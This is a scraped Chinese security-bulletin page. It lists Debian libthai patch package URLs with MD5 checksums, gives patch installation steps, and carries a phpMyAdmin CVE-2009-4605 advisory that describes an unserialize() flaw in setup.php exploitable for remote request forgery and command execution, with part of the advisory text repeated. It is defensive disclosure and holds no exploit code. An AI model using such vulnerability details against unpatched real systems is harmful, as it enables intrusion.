http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.9-4+lenny1_alpha.deb Size/MD5 checksum:    34054 d047070a3b08a380cd304ecd194109aa http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.9-4+lenny1_alpha.deb Size/MD5 checksum:    54690 4de38aed7f22b9e01ec53ee32c05e58b amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.9-4+lenny1_amd64.deb Size/MD5 checksum:    51984 9e761529b0139802363713f7e6264dec http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.9-4+lenny1_amd64.deb Size/MD5 checksum:    32856 1a21ca0f1fcc8c33df02cef4919fbb88 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.9-4+lenny1_armel.deb Size/MD5 checksum:    51490 adc555d0ae19aae401e2cd232fdacb40 http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.9-4+lenny1_armel.deb Size/MD5 checksum:    30612 49efdccbf1aa050622c9d223b6a6a6c5 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.9-4+lenny1_hppa.deb Size/MD5 checksum:    53286 8b84d1971d792fca59ef9efa50a0884b http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.9-4+lenny1_hppa.deb Size/MD5 checksum:    32242 014d0388a134b8d8cde93003ae6434db i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.9-4+lenny1_i386.deb Size/MD5 checksum:    32160 f19a565bf901c698847ba93e42f5789a http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.9-4+lenny1_i386.deb Size/MD5 checksum:    52164 c9b70533c0178ae34a96d9216115567a ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.9-4+lenny1_ia64.deb Size/MD5 checksum:    56774 53d03379cc4be19b1ea8e33f0534bf9a http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.9-4+lenny1_ia64.deb Size/MD5 checksum:    37010 64c9db9290de84436d02b405b239651f mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.9-4+lenny1_mips.deb Size/MD5 checksum:    53818 79a9a273a3cd3b4721c08f1a4f43f2eb http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.9-4+lenny1_mips.deb Size/MD5 checksum:    31532 2044421cb84b03de4829c227f6087aa1 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.9-4+lenny1_mipsel.deb Size/MD5 checksum:    31654 523e24977ecec4050d91e8b5401a8732 http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.9-4+lenny1_mipsel.deb Size/MD5 checksum:    52506 6014c6fe90b21a31242db8f010ee1874 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.9-4+lenny1_powerpc.deb Size/MD5 checksum:    52096 0e1a1abb02fe8d2c9f93ba2788d40067 http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.9-4+lenny1_powerpc.deb Size/MD5 checksum:    32828 ba2908fcbb432f111e72f7fb1dd7d099 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.9-4+lenny1_s390.deb Size/MD5 checksum:    52834 b67461df3f0fb2a8639007ac711ee5ad http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.9-4+lenny1_s390.deb Size/MD5 checksum:    33722 cb47d0ee8bc073b6e52853c3380ca3cd sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/libt/libthai/libthai-dev_0.1.9-4+lenny1_sparc.deb Size/MD5 checksum:    50938 977d77534530f4a9d77243fd411bd197 http://security.debian.org/pool/updates/main/libt/libthai/libthai0_0.1.9-4+lenny1_sparc.deb Size/MD5 checksum:    31344 3b2e025f461c07c8802fb486e5aeb4d6 补丁安装方法： 1. 手工安装补丁包：   首先，使用下面的命令来下载补丁软件：   # wget url  (url是补丁下载链接地址)   然后，使用下面的命令来安装补丁：    # dpkg -i file.deb (file是相应的补丁名) 2. 使用apt-get自动安装补丁包：    首先，使用下面的命令更新内部数据库：    # apt-get update      然后，使用下面的命令安装更新软件包：    # apt-get upgrade LibThai ------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://linux.thai.net/node/184 LibThai,整数,溢出,漏洞 漏洞公告 admin 绿盟科技 2010-01-21 13:51 http://www.serversteam.com/S/Vuln/vuln_601.html 受影响系统： phpMyAdmin phpMyAdmin 2.11.x 不受影响系统： phpMyAdmin phpMyAdmin 2.11.10 描述：BUGTRAQ ID: 37861 CVE(CAN) ID: CVE-2009-4605 phpMyAdmin是用PHP编写的工具，用于通过WEB管理MySQL。 phpMyAdmin使用了传送给s 受影响系统：     phpMyAdmin phpMyAdmin 2.11.x 不受影响系统：     phpMyAdmin phpMyAdmin 2.11.10 描述：BUGTRAQ  ID: 37861 CVE(CAN) ID: CVE-2009-4605 phpMyAdmin是用PHP编写的工具，用于通过WEB管理MySQL。 phpMyAdmin使用了传送给scripts/setup.php脚本的configuration和v[0]输入参数来调用unserialize函数，远程攻击者可以通过提交恶意请求执行跨站请求伪造攻击，以其他用户的权限执行任意指令。 <*来源：Thomas Biege （thomas@suse.de）         Sebastian Krahmer （krahmer@suse.de）     链接：http://secunia.com/advisories/38211         http://www.phpmyadmin.net/home_page/security/PMASA-2010-3.php *> 建议：厂商补丁： phpMyAdmin ---------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://www.phpmyadmin.net/ phpMyAdmin,unserialize(),跨站,伪造 漏洞公告 admin 绿盟科技 2010-01-21 13:48